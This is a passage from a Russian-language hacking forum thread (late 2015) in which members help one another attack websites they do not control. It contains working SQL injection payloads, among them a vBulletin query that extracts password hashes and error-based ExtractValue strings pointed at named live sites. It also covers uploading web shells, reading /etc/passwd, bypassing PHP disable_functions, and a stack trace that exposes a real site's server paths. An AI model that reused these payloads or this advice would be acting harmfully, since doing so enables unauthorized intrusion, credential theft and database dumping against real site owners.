P.S. Чтобы не создавать нового сообщения, спрошу здесь же: )))

Joomla 2.5.7

Component: com_content

Component: com_jce

Component: com_jdownloads

Component: com_newsfeeds

Component: com_users

Component: com_xmap

Есть ли смысл и варианты ???

kingbeef
07.12.2015, 22:33
xaj3uie said:
↑ (https://antichat.live/posts/3924574/)
Да читал, иногда нужно спросить и убедиться.
Вот только на мои детские вопросы вы конкретно так и не ответили!
P.s. модерам спасибо, все мы когда-то были новички...


Простите, а какой у Вас был вопрос?

Направьте в нужное русло?

Так Вас направили. Вам предоставили вектор атаки, дальше все по "фабуле".

profishell
07.12.2015, 22:36
UNIXTREID said:
↑ (https://antichat.live/posts/3924594/)
Извиняюсь за вопросы, гуглил, но как-то выдача не удалась.
..
1)Есть ли какие-то недавние рабочие RCE под такие сервисы???
nginx 1.6.2

Microsoft IIS 6.0

ASP.NET 1.1.4322

ASP.NET 2.0.50727
2)И ещё один вопрос:
зависят ли как-то версии компонентов Joomla от основной версии самой Joomla ???
Существуют ли какие-то удобные, к примеру, таблицы, где чётко сопоставляются версия компонента с версией самой CMS ??? Или компоненты обновляются только с версией CMS ? Просто чтобы раскручивать сайт, узнал версию джумлы и её установленные дополнения, вот и думаю, по какой версии подбирать эксплоит...
P.S. Чтобы не создавать нового сообщения, спрошу здесь же: )))
Joomla 2.5.7
Component: com_content

Component: com_jce

Component: com_jdownloads

Component: com_newsfeeds

Component: com_users

Component: com_xmap
Есть ли смысл и варианты ???


По первому вопросу - топаем на exploit-db и узнаем все через поиск, по второму вопросу, да, версия компонентов зависит от версии джумлы, кстати, com_jdownloads и com_xmap компоненты сторонние, в com_xmap дыр нет.

faza02
08.12.2015, 00:34
RWD said:
↑ (https://antichat.live/posts/3923892/)
вообще реально залить файл если sql time based blind? права mysql root


да, реально. https://rdot.org/forum/showthread.php?t=60


BlitzXX said:
↑ (https://antichat.live/posts/3923856/)
XSS:
фильтра нету,
Максимальное кол-во символов 32.
Как сделать?
Нахождение:

Code:
[XSS] бла-бла-бла...

Делал так, запрос идет, но не выполняется сам скрипт xss'ки. Проблема в (его нету)

Code:




нужен домен из трех символов.

Sensoft
08.12.2015, 15:43
В общем такой вопрос взламываю способом

.SpoilerTarget" type="button">Spoiler: Скрипт
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
В ошибке должен выходить pass (без соли на это другой скрипт)

Но выходит такая годня почему ?

http://s8.hostingkartinok.com/uploads/images/2015/12/7b5049448ce5b65dde6e11d1a2b1ffd5.png

Даже если соль хочу вывести всё ровно такая хрень

и это не единственный сайт где такие траблы

vBulletin

t0ma5
08.12.2015, 17:09
Sensoft said:
↑ (https://antichat.live/posts/3924866/)
В общем такой вопрос взламываю способом
Spoiler: Скрипт
securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
В ошибке должен выходить pass (без соли на это другой скрипт)
Но выходит такая годня почему ?
http://s8.hostingkartinok.com/uploads/images/2015/12/7b5049448ce5b65dde6e11d1a2b1ffd5.png
Даже если соль хочу вывести всё ровно такая хрень
и это не единственный сайт где такие траблы
vBulletin


так красным по белому же написано что таблицы user нет, information_schema рекомендую глянуть

UNIXTREID
11.12.2015, 15:23
profishell said:
↑ (https://antichat.live/posts/3924650/)
По первому вопросу - топаем на exploit-db и узнаем все через поиск, по второму вопросу, да, версия компонентов зависит от версии джумлы, кстати, com_jdownloads и com_xmap компоненты сторонние, в com_xmap дыр нет.


profishell, поискал на великом exploit-db:

1.По nginx есть сплоиты, но версия раньше, чем 1.6.2 (Максимум, что там есть - 1.4.0)

2.Microsoft IIS 6.0 - целая пачка, но из них несколько DoS'ов , другие какие-то старые...

3.По ASP.NET тоже половину старые, что есть нормального, то или DoS, или Padding Oracle.

По Jooml'е спасибо, буду знать. Но есть ли дыры в других компонентах, нежели com_jdownloads или com_xmap??? Я где-то видел, что com_users можно раскрутить, да и компонент распространённый. Com_newsfeeds тоже довольно интересный

vikler
13.12.2015, 16:03
Ребят, кто работал по coldfusion, что-нибудь можно сделать? Какие-то нестандартные sql версии. Ну, то есть, не MSSQL/MySQL/Oracle(?) Подскажите действия... К примеру:


Code:
http://borsariimages.com/archive/public/AssetDetail.cfm?aid=S-AAS-414-PB&lid=1%27&rdir=lightboxes&rpage=ViewLightboxContents&orig=p



Code:
http://178.63.177.70/huber/huber/images/showPicture.cfm?imgNo=77447141%27&language=1

BabaDook
14.12.2015, 16:16
Всем привет. Давно я вам тут глупых вопросов не задавал, надо наверстать.

Сложилась такая штуковина есть доступ к myadmin с правами рута, всё как надо, но вот засада , нету пути, phpinfo и при выполнение команды selecl load_file('etc/passwd'); отдаётся хрень. Есть Но не НАЛ. фото

.SpoilerTarget" type="button">Spoiler
http://s019.radikal.ru/i639/1512/5e/d9e3f0dc32ab.jpg (http://radikal.ru/big/4416c3232d644eb18e4596fc3a74a108)
Ну да вопросы, как найти путь? Как заставить читать файлы. Мысли только подключатся с консоли и пробовать разные варианты, брут в ручную с путями var/www/site var/www/public_html/site/... может есть что-то универсальное

BabaDook
15.12.2015, 00:08
palec2006 said:
↑ (https://antichat.live/posts/3927389/)
параметры нажми, всё там


спасибо , решили так, записали вывод в таблицу

kingbeef
15.12.2015, 23:31
palec2006 said:
↑ (https://antichat.live/posts/3927389/)
параметры нажми, всё там


Еще один способ ( я описывал)

Если сервер на фряхе, то при запрсое select load file('/') , то показывает все папки в корне и так далее.

Filipp
16.12.2015, 15:11
Народ, кто Metasploit юзает, как задать пейлоад для выполнение кастомного php-кода, а не реверс коннект?

sats
17.12.2015, 01:01
Может кто пнет в нужном направлении!!! - есть сайт на wordpress 2.0(php 5.4.4) c установленным плагином wpSS (www.securityfocus.com/bid/28894/exploit (http://www.securityfocus.com/bid/28894/exploit)), использовал запрос следующего вида - wp-content/plugins/wpSS/ss_handler.php?display=0&edit=&ss_id=1%27", однако при попытке провести SQL инжект приходят ошибки от wordpress. волнует сообщение которое сообщает об отсутствии таблицы(выделено красным)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1]

SELECT * FROM wp_spreadsheet WHERE id='1'"'

WordPress database error: [Table 'wordpress.wp_spreadsheet' doesn't exist]

INSERT INTO wp_spreadsheet (ss_tablehtml, ss_name, ss_description) VALUES ('

', 'New', 'Blank spreadsheet');

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"' at line 1]

SELECT * FROM wp_spreadsheet WHERE id = 1'";

В связи с этим вопрос гуру SQL - возможно ли провести полноценный инжект без данной таблицы, или искать новую уязвимость?

OSW
17.12.2015, 11:30
sats said:
↑ (https://antichat.live/posts/3928476/)
Может кто пнет в нужном направлении!!! - есть сайт на wordpress 2.0(php 5.4.4) c установленным плагином wpSS (
www.securityfocus.com/bid/28894/exploit (http://www.securityfocus.com/bid/28894/exploit)
), использовал запрос следующего вида - wp-content/plugins/wpSS/ss_handler.php?display=0&edit=&ss_id=1%27", однако при попытке провести SQL инжект приходят ошибки от wordpress. волнует сообщение которое сообщает об отсутствии таблицы(выделено красным)
WordPress database error
: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1]
SELECT * FROM wp_spreadsheet WHERE id='1'"'
WordPress database error: [Table 'wordpress.wp_spreadsheet' doesn't exist]
INSERT INTO wp_spreadsheet (ss_tablehtml, ss_name, ss_description) VALUES ('
', 'New', 'Blank spreadsheet');
WordPress database error
: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"' at line 1]
SELECT * FROM wp_spreadsheet WHERE id = 1'";
В связи с этим вопрос гуру SQL - возможно ли провести полноценный инжект без данной таблицы, или искать новую уязвимость?


Ну мб префикс базы не тот просто?

sats
18.12.2015, 01:43
в смысле префикс? table в скрипте жестко прописан. вопрос в том - возможно ли часть SQL операции отменить при ее атомарности.

FireRidlle
18.12.2015, 19:52
может кто обьяснить почему получается достать версию бд, а имя бд, пользователя, и вообще выполнить какой то запрос не получается.

?ref=258'and+extractvalue(rand(),concat(0x3a,versi on(),0x3a,1))+and+' выводит CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':5.5.45-cll-lve:1'

когда вместо version() написать database() или user() или select email from users limit 1 то просто показывает домашнюю страницу.

ели попробовать сделать запрос к какой то несуществующей таблице select email from sdfsdfsdf limit 1, то вот такая ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'ourmudss_om.vdfgdgd' doesn't exist

grimnir
18.12.2015, 20:23
FireRidlle said:
↑ (https://antichat.live/posts/3929152/)
может кто обьяснить почему получается достать версию бд, а имя бд, пользователя, и вообще выполнить какой то запрос не получается.
?ref=258'and+extractvalue(rand(),concat(0x3a,versi on(),0x3a,1))+and+' выводит CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':5.5.45-cll-lve:1'
когда вместо version() написать database() или user() или select email from users limit 1 то просто показывает домашнюю страницу.
ели попробовать сделать запрос к какой то несуществующей таблице select email from sdfsdfsdf limit 1, то вот такая ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'ourmudss_om.vdfgdgd' doesn't exist


Похоже что WAF

Filipp
19.12.2015, 12:14
Недавно залился на один ресурс и получил интересную ситуацию. Допустим в каталоге /var/www/user1/ существует папка tmp, на нее полные права (0777). Но как только пытаюсь достучаться с к этой папке с user2 получаю permission denied. Причем если выполнить file /var/www/user1/ выведет -- directory, но если file /var/www/user1/tmp -- permission denied. Даже на те файлы которых не существует получаю отказ. Как такое возможно? И есть ли способы с этим бороться?

Unknown
20.12.2015, 12:18
интересует такой вопрос: на сайте есть функция восстановления пароля, после запроса на новый пароль на почту приходит письмо с ссылкой вида site.com/resetpass/key/ZOmj13vAouddy97p%2B2evcLnE7B1S7g1ACezVUhYUt4h%2BHi iL5hbkcS64EBswt2nmQKzES8Z5RvYF0GASmAOR5CdGwV%2FMO4 Y0WrbP8%2F5Oqv8yVwcB3VyQWuvcsiNlWyaqKRkT5zIVOQHQyc 6aHGTbyDWmpS84ylEZQlc6i7ib8Io%3D исходников к сожалению нет. подскажите плс какова вероятность того что значение параметра key хранится в бд? на основании чего формируется ключ тоже не понятно.

faza02
20.12.2015, 14:22
rumbln said:
↑ (https://antichat.live/posts/3929643/)
интересует такой вопрос: на сайте есть функция восстановления пароля, после запроса на новый пароль на почту приходит письмо с ссылкой вида site.com/resetpass/key/ZOmj13vAouddy97p%2B2evcLnE7B1S7g1ACezVUhYUt4h%2BHi iL5hbkcS64EBswt2nmQKzES8Z5RvYF0GASmAOR5CdGwV%2FMO4 Y0WrbP8%2F5Oqv8yVwcB3VyQWuvcsiNlWyaqKRkT5zIVOQHQyc 6aHGTbyDWmpS84ylEZQlc6i7ib8Io%3D исходников к сожалению нет. подскажите плс какова вероятность того что значение параметра key хранится в бд? на основании чего формируется ключ тоже не понятно.


ключ всегда разный? это base64, посмотрите, разной ли он длинны, если сменить почту. вероятность есть, но самая простая реализация возможна и без этого

faza02
20.12.2015, 14:23
FireRidlle said:
↑ (https://antichat.live/posts/3929152/)
может кто обьяснить почему получается достать версию бд, а имя бд, пользователя, и вообще выполнить какой то запрос не получается.
?ref=258'and+extractvalue(rand(),concat(0x3a,versi on(),0x3a,1))+and+' выводит CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':5.5.45-cll-lve:1'
когда вместо version() написать database() или user() или select email from users limit 1 то просто показывает домашнюю страницу.
ели попробовать сделать запрос к какой то несуществующей таблице select email from sdfsdfsdf limit 1, то вот такая ошибка CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'ourmudss_om.vdfgdgd' doesn't exist


SCHEMA()?

SESSION_USER()

SYSTEM_USER()

Unknown
20.12.2015, 17:17
yarbabin said:
↑ (https://antichat.live/posts/3929683/)
ключ всегда разный? это base64, посмотрите, разной ли он длинны, если сменить почту. вероятность есть, но самая простая реализация возможна и без этого


Ключ разный если ввести другую почту и отличается при повторном запросе даже если почта та же самая (включая ip, браузер). тоже думал что base64 но ничего раскодировать так и не вышло.

три ключа (два - одно мыло, еще 1 - тестовый с другого):

wvB5ZVWZXhDGoI1XkcJBfHlAlMNg66awBEA0kNasXtyVW7Lmvt V8AawkESYDXivXomhAW9%2Fob4gL0JJkFF88DdFXISPFZP0nXV TIV2fJ0CNSy6K3PDiyoXie0hg5zmh1gmGwBPsZtUJLFym0gFzy YOQMIgeKIYqd517dapbJdko%3D

ZOmj13vAouddy97p%2B2evcLnE7B1S7g1ACezVUhYUt4h%2BHi iL5hbkcS64EBswt2nmQKzES8Z5RvYF0GASmAOR5CdGwV%2FMO4 Y0WrbP8%2F5Oqv8yVwcB3VyQWuvcsiNlWyaqKRkT5zIVOQHQyc 6aHGTbyDWmpS84ylEZQlc6i7ib8Io%3D

e89PzSq50NLMJm8w6tY9X5BjPY5hlg%2BwuYw0y8GghI3ynHtk bsUzwkSvmHZyyTgrdmtSk1shFTw2%2BgmPwHCcTBAnDyvC65yd ZyUvHcXM6R0YBnJ1ij2P07tvvpr%2BHLbDEDiKa3Gd1aySwyV4 Z2LPB1IPouKF56c53R75hDzXvNc%3D

FireRidlle
21.12.2015, 00:23
yarbabin said:
↑ (https://antichat.live/posts/3929684/)
SCHEMA()?
SESSION_USER()
SYSTEM_USER()


нет. еще проходит @@hostname

BabaDook
21.12.2015, 23:50
Всем привет, пару вопросов.

почему такое происходит, заливаю через sql null, В файл записывается Два раза записывается.

Залил шел не выполняется cat /etc/passd а так load_file('/etc/passwd') читается. можно что-то сделать такое, что бы команда cd / выполнилась от мускуля ))) ssi шел 403 ((

курул ману, всё в УДФ пост эксплуатации сводится, есть другие варианты?

grimnir
22.12.2015, 00:16
BabaDook said:
↑ (https://antichat.live/posts/3930376/)
Залил шел не выполняется cat /etc/passd а так load_file('/etc/passwd') читается


Там опечатка в первом запросе надо cat /etc/passwd ,а может еще и пробел заменить на + %20 и т.д

5maks5
22.12.2015, 00:33
BabaDook said:
↑ (https://antichat.live/posts/3930376/)
можно что-то сделать такое, что бы команда cd / выполнилась от мускуля ))


Нет.

Пробуй cp -R

BabaDook
22.12.2015, 00:53
grimnir said:
↑ (https://antichat.live/posts/3930396/)
Там опечатка в первом запросе надо cat /etc/passwd ,а может еще и пробел заменить на + %20 и т.д


ну да, тут опечатка, но в шеле не выполняется не одна команда , ls . cd. cat обычно ssi шел помогал.

чтение через уязвимость есть, а на шеле нету, у меня только одна мысль и она такая. Мускул на общем хостинге имеет выше права чем шел работающий от юзера которому выделили место на сервере. Если такое может быть ))


5maks5 said:
↑ (https://antichat.live/posts/3930408/)
Нет.
Пробуй cp -R


копирование Хм.. как вариант. но не выполнится

5maks5
22.12.2015, 02:04
BabaDook said:
↑ (https://antichat.live/posts/3930420/)
копирование Хм.. как вариант. но не выполнится


Не выполнится просто cp

cp -R даже от www-data выполняется

faza02
22.12.2015, 02:09
BabaDook said:
↑ (https://antichat.live/posts/3930376/)
Всем привет, пару вопросов.
почему такое происходит, заливаю через sql null, В файл записывается Два раза записывается.
Залил шел не выполняется cat /etc/passd а так load_file('/etc/passwd') читается. можно что-то сделать такое, что бы команда cd / выполнилась от мускуля ))) ssi шел 403 ((
курул ману, всё в УДФ пост эксплуатации сводится, есть другие варианты?


непонятно: у вас проблема в том, что не выполняется PHP, или выполняется, но не работают системные команды?

BabaDook
22.12.2015, 11:07
yarbabin said:
↑ (https://antichat.live/posts/3930444/)
непонятно: у вас проблема в том, что не выполняется PHP, или выполняется, но не работают системные команды?


системные команды не работают

faza02
22.12.2015, 11:28
BabaDook said:
↑ (https://antichat.live/posts/3930519/)
системные команды не работают


может просто system() выключен? залейте веб шелл и смотрите уже из него

BabaDook
22.12.2015, 11:40
yarbabin said:
↑ (https://antichat.live/posts/3930526/)
может просто system() выключен? залейте веб шелл и смотрите уже из него


Ну так да, там всё офф. Чё-то я не могу норм объяснить.. ...

SignUp
22.12.2015, 12:41
BabaDook said:
↑ (https://antichat.live/posts/3930531/)
Ну так да, там всё офф. Чё-то я не могу норм объяснить.. ...


Посмотри disable_functions, safe_mode, open_basedir, если вариантов нет, попробуй выполнить через баги в самом PHP: rdot.org/forum/showthread.php?t=3309 или https://www.google.com/search?q=disable_functions+bypass

Так же если стоит Apache можно попробовать через mod_include, mod_perl, mod_cgi

BabaDook
22.12.2015, 14:53
SignUp said:
↑ (https://antichat.live/posts/3930542/)
Посмотри disable_functions, safe_mode, open_basedir, если вариантов нет, попробуй выполнить через баги в самом PHP: rdot.org/forum/showthread.php?t=3309 или
https://www.google.com/search?q=disable_functions+bypass
Так же если стоит Apache можно попробовать через mod_include, mod_perl, mod_cgi


Спасибо, про апачь я забыл, курим в сторону УДФ safe_mode= офф open_basedir=выключена disable_functions exe system shell итд выключены. за апачь спасибо

AlexG
23.12.2015, 08:29
Все привет. Нашел ошибку mysql. Вызывается вот так:

http://site.com/main/id[]/1/page/'1

Сама ошибка:


Code:
Invalid SQL: SELECT * FROM site_main WHERE main_active='Y' ORDER BY main_date DESC, main_id DESC LIMIT -18,18
1064: (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-18,18' at line 1)

Если убрать массив - то ошибка пропадает и все нормально работает. Пробовал вместо кавычки пихать все, что знаю - ошибка не меняется.

Вместо кавычки можно поставить все, кроме цифр - тогда ошибка сохраняется.

Куда копать?

BabaDook
23.12.2015, 11:11
AlexG said:
↑ (https://antichat.live/posts/3930920/)
Все привет. Нашел ошибку mysql. Вызывается вот так:
http://site.com/main/id[]/1/page/'1
Сама ошибка:

Code:
Invalid SQL: SELECT * FROM site_main WHERE main_active='Y' ORDER BY main_date DESC, main_id DESC LIMIT -18,18
1064: (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-18,18' at line 1)

Если убрать массив - то ошибка пропадает и все нормально работает. Пробовал вместо кавычки пихать все, что знаю - ошибка не меняется.
Вместо кавычки можно поставить все, кроме цифр - тогда ошибка сохраняется.
Куда копать?




PHP:
'-18,18'at line 1)

Судя по этому нету инъекции.

Ну как ты и сказал, нашёл ошибку, будь внимателен к словам, они материализуются

faza02
23.12.2015, 11:30
пора это в фак что ли засунуть.


BabaDook said:
↑ (https://antichat.live/posts/3930940/)

PHP:
'-18,18'at line 1)

Судя по этому нету инъекции.


все так

kacergei
25.12.2015, 01:32
yarbabin said:
↑ (https://antichat.live/posts/3931832/)
вывода ошибок нет?


нету

UNIXTREID
25.12.2015, 16:05
Подскажите по вот этому эксплойту: https://www.exploit-db.com/exploits/38005/ (MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit) Просто раньше не работал с такими, asp'овскими. Как их эксплуатировать? Я видел, допустим, в примерах с php заливают эксплойт на сервер и просто переходят на него по ссылке для эксплуатации. Здесь вроде такой же подход? И какой именно шеллкод у этого сплоита? Просто, допустим, нужно открыть порт, а он вроде бы по другим командам...

И ещё, подскажите, кто знает, для каких версий SQL 2005 подходит данный сплоит. Там расписано больше, что под SQL Server 2000 SP4, а по 2005 мало что сказано (((

vivona
26.12.2015, 12:25
не тянет не хавидж не sqlmap вот такую вот скулю


Code:
http://www.sosbettingtips.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1

как раскрутить sqlmapom или еще чем нить это божетво.

PoliGroS
26.12.2015, 15:51
Проверял один магазин и Acutenix сказал что есть тут sql inject


POST /get_products.php HTTP/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
.....
.....
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
offset=0&p=b&pr=all&sort=new&t=1'


И какого типа эта уязвимость?

Вопрос а как дальше крутить? что подставлять?

vivona
26.12.2015, 15:54
PoliGroS said:
↑ (https://antichat.live/posts/3932461/)
Проверял один магазин и Acutenix сказал что есть тут sql inject
И какого типа эта уязвимость?
Вопрос а как дальше крутить? что подставлять?


Ставь Live http headers на мозилу и крути

vivona
26.12.2015, 16:29
vivona said:
↑ (https://antichat.live/posts/3932408/)
не тянет не хавидж не sqlmap вот такую вот скулю

Code:
http://www.sosbettingtips.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1

как раскрутить sqlmapom или еще чем нить это божетво.


руками все норм, нужно слить базу но незнаю как кроме sqlmap или хавидж

PoliGroS
26.12.2015, 16:31
vivona said:
↑ (https://antichat.live/posts/3932463/)
Ставь Live http headers на мозилу и крути


я через burp suite работаю, мне интересно что это за уязвимость и как ее дальше крутить? как обычную sql?

Получаю вот такой ответ.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND print_status=0 AND print_redirect='' GROUP BY app_deal.id ORDER BY print_st' at line 1

vivona
26.12.2015, 16:38
PoliGroS said:
↑ (https://antichat.live/posts/3932478/)
я через burp suite работаю, мне интересно что это за уязвимость и как ее дальше крутить? как обычную sql?
Получаю вот такой ответ.

vivona
26.12.2015, 16:38
поробуй через error baze вывести имена таблиц вот таким запросом


Code:
'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1

PoliGroS
26.12.2015, 19:49
vivona said:
↑ (https://antichat.live/posts/3932485/)
поробуй через error baze вывести имена таблиц вот таким запросом

Code:
'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1





HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 26 Dec 2015 15:48:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 227
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND print_status=0 AND print_redirect='' GROUP BY app_deal.id ORDER BY print_st' at line 1

vivona
27.12.2015, 15:20
vivona said:
↑ (https://antichat.live/posts/3932477/)
руками все норм, нужно слить базу но незнаю как кроме sqlmap или хавидж


что некто не может раскрутить*?)

faza02
27.12.2015, 18:32
vivona said:
↑ (https://antichat.live/posts/3932783/)
что некто не может раскрутить*?)


написать скрипт же

vivona
27.12.2015, 18:49
yarbabin said:
↑ (https://antichat.live/posts/3932852/)
написать скрипт же


Да вот найти бы умельца(сам в этом еще не соображаю

.Light.
27.12.2015, 21:32
jos-Warning: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = 'http://www.raa.ru/index.php?id=2011\'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 /home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}

Что можно хорошего получить от этой ошибки?

vivona
28.12.2015, 00:03
.Light. said:
↑ (https://antichat.live/posts/3932932/)
jos-Warning
: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = '
http://www.raa.ru/index.php?id=2011\
'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 /home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}
Что можно хорошего получить от этой ошибки?


раскрытие путей, не больше, скули тут нет

faza02
28.12.2015, 00:58
vivona said:
↑ (https://antichat.live/posts/3933052/)
раскрытие путей, не больше, скули тут нет


с чего вы взяли?


.Light. said:
↑ (https://antichat.live/posts/3932932/)
jos-Warning
: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = '
http://www.raa.ru/index.php?id=2011\
'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 